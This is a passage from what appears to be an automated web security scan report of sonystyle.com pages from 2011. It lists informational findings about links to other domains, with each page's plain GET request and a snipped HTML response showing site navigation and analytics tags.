https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?cmsId=smb_landing_page&catalogId=10551&storeId=10151&langId=-1 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 84689
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 84689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<div class="seoImage intelI7"><a class="externalCTA" id="promo01_intelI7" rel="processorBadge" target="_new" href="http://syndication.intel.com/DistributeModule.aspx?id=16972">Intel Core i7 - Visibly Smart</a>
...[SNIP]...
<div class="seoImage intelI7"><a class="externalCTA" id="promo02_intelI7" rel="processorBadge" target="_new" href="http://syndication.intel.com/DistributeModule.aspx?id=16972">Intel Core i7 - Visibly Smart</a>
...[SNIP]...
<div class="seoImage intelI7"><a class="externalCTA" id="promo03_intelI7" rel="processorBadge" target="_new" href="http://syndication.intel.com/DistributeModule.aspx?id=16972">Intel Core i7 - Visibly Smart</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

10.6. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView?hideHeaderFooter=false&storeId=10151&catalogId=10551&langId=-1&cmsId=tradeup

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://green.sel.sony.com/
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://products.sel.sony.com/SEL/legal/privacy.html
http://recycling.econewonline.com/sonystyle/?q=main
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.econewonline.com/sonystyle
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?hideHeaderFooter=false&storeId=10151&catalogId=10551&langId=-1&cmsId=tradeup HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92247
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 92247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li>
<a href="http://www.econewonline.com/sonystyle" target="_blank" class="">
<img src="/wcsstore/SonyStyleStorefrontAssetStore/img/static_images/tradein_cta_get_started_111x26.jpg" alt="Get Started" />
...[SNIP]...
</p>
<a class="redArrowLink" href="http://green.sel.sony.com" target="_blank">Learn more</a>
...[SNIP]...
<p class="answer">
A: Trade-in value offers are based on the reuse value of the item you are trading in.
<a href="http://recycling.econewonline.com/sonystyle/?q=main" target="_blank">Click here</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

10.7. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView?storeId=10151&catalogId=10551&langId=-1&XID=M:esupport

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://products.sel.sony.com/SEL/legal/privacy.html
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/SYNewsletterOptInView?storeId=10151&catalogId=10551&langId=-1&XID=M:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 76356
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 76356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

10.8. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYSiteMapView

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView?storeId=10151&catalogId=10551&langId=-1

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/
http://esupport.sony.com/US/perl/contact-land.pl
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://green.sel.sony.com/index.html
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://products.sel.sony.com/SEL/legal/privacy.html
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/SYSiteMapView?storeId=10151&catalogId=10551&langId=-1 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 165897
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:09 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 165897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
